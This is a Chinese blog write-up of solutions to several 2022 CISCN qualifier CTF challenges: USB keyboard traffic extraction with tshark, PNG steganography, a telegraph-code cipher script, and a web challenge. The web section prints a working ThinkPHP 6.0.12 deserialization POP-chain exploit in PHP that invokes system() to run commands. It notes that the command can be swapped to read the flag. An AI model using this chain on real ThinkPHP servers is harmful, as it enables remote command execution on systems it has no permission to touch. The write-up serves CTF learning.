• [2022CISCN]初赛 复现


    ez_usb 

    刚开始直接提取usb键盘流量,发现导出有问题

    键盘流量,搜索8个字节长度的数据包,这里也能发现版本有2.8.1和2.10.1两种,因此猜测需要分别导出

    1. tshark -r ./ez_usb.pcapng -Y 'usb.data_len == 8' -Y 'usb.src =="2.8.1"' -T fields -e usb.capdata > 1.txt
    2. tshark -r ./ez_usb.pcapng -Y 'usb.data_len == 8' -Y 'usb.src =="2.10.1"' -T fields -e usb.capdata > 2.txt

    提取出两段数据 

     然后拿脚本去解键盘流量,分别得到数据如下

    1. output: 526172211a0700Cf907300000d00000000000000c4527424943500300000002A00000002b9f9b0530778b5541d33080020000000666c61672E747874B9Ba013242f3aFC000b092c229d6e994167c05A78708b271fFC042ae3d251e65536F9Ada87c77406b67d0E6316684766a86e844dC81AA2c72c71348d10c43D7B00400700
    2. output :35c535765e50074a

    第一个数据用010保存16进制文件,得到一个rar文件

    第二个数据就是密码 

     

    everlasting_night

    仔细观察png数据块,通道隐藏的数据可以配合lsb隐写

    PNG文件尾后面的16进制数据,是md5  

    ohhWh04m1 

    stegslove打开翻通道,A2通道有信息

     

     f78dcd383f1b574b

    lsb隐写脚本可以分离出东西 , f78dcd383f1b574b是密码

     

    提取出来out文件,需要密码,就是ohhWh04m1 

    解出来是个损坏的png,看wp有个工具gimp

    需要重名名为data文件

    gimp flag.data

    签到电台

    在“标准电码表”找“弼时安全到达了”所对应的7个电码,再跟“密码本”的前7*4个数字分别逐位进行“模十算法”(加不进位、减不借位),所得到的就是要发送的电码。
    发送电码前先发送“s”启动,即按3个“.”,这个发送电报的过程可以使用抓包软件进行抓取,可方便输入电报。
    (如果您还需要进一步的提示,可在本公众号输入“豪密剖析”获取。)
    “弼时安全到达了”所对应的7个电码:1732 2514 1344 0356 0451 6671 0055
    模十算法示例:1732与6378得到7000
    发包示例:/send?msg=s 

    1. a = '99643341808268586836775501600817585713493257766561476063601867596343105374607456471099628834298182339040868150740' \
    2. '9511612238587443601660278684275641000975730184165996600423556460848669900431897229857720894775658109911874842297207211' \
    3. '874555613481342526489469108931355995699901993003656750839977460316073816952542983844454554912374637487610435202414085664' \
    4. '59011252194284601222413675885829671754541410117754160428719487295645115327768288544685069742397764022225956726271320557630' \
    5. '43102657536225660163856239886863333649499474893205993474'[:28]
    6. b = '1732251413440356045166710055'
    7. res = ''
    8. for i in range(28):
    9. tmp = (int(a[i]) + int(b[i])) % 10
    10. res += str(tmp)
    11. print(res)

    跟据提示脚本算出密文,然后根据session发包

    Ezpop 

     

    www.zip 源码泄露  

    在index.php下的index类中的test方法找到路由

    寻找网上的链子 

    ThinkPHP6.0.12LTS反序列漏洞分析 - FreeBuf网络安全行业门户

    1. namespace think {
    2. abstract class Model
    3. {
    4. private $lazySave = false;
    5. private $data = [];
    6. private $exists = false;
    7. protected $table;
    8. private $withAttr = [];
    9. protected $json = [];
    10. protected $jsonAssoc = false;
    11. function __construct($obj = '')
    12. {
    13. $this->lazySave = True;
    14. $this->data = ['whoami' => ['dir /']];
    15. $this->exists = True;
    16. $this->table = $obj;
    17. $this->withAttr = ['whoami' => ['system']];
    18. $this->json = ['whoami', ['whoami']];
    19. $this->jsonAssoc = True;
    20. }
    21. }
    22. }
    23. namespace think\model {
    24. use think\Model;
    25. class Pivot extends Model
    26. {
    27. }
    28. }
    29. namespace {
    30. echo (urlencode(serialize(new think\model\Pivot(new think\model\Pivot()))));
    31. }

    利用poc生成payload 

    然后在正确路径下打 

     修改命令 获得flag

  • 相关阅读:
    ORB-SLAM3在windows11下的编译使用
    【Django】REST_Framework框架——APIView类源码解析
    antd结合reactRouter实现侧边栏菜单动态渲染
    【毕业设计】基于单片机的智能温控农业大棚系统 - 物联网 stm32
    第二季度邮件安全报告:邮件攻击暴增4倍,利用知名品牌获取信任
    使用163开源镜像升级Centos
    Maven基础学习——tomcat插件配置(含web工程配置)
    [附源码]java毕业设计毕业设计管理系统
    你不知道的JavaScript----promise
    贪心算法|45.跳跃游戏II
  • 原文地址:https://blog.csdn.net/qq_61768489/article/details/125564800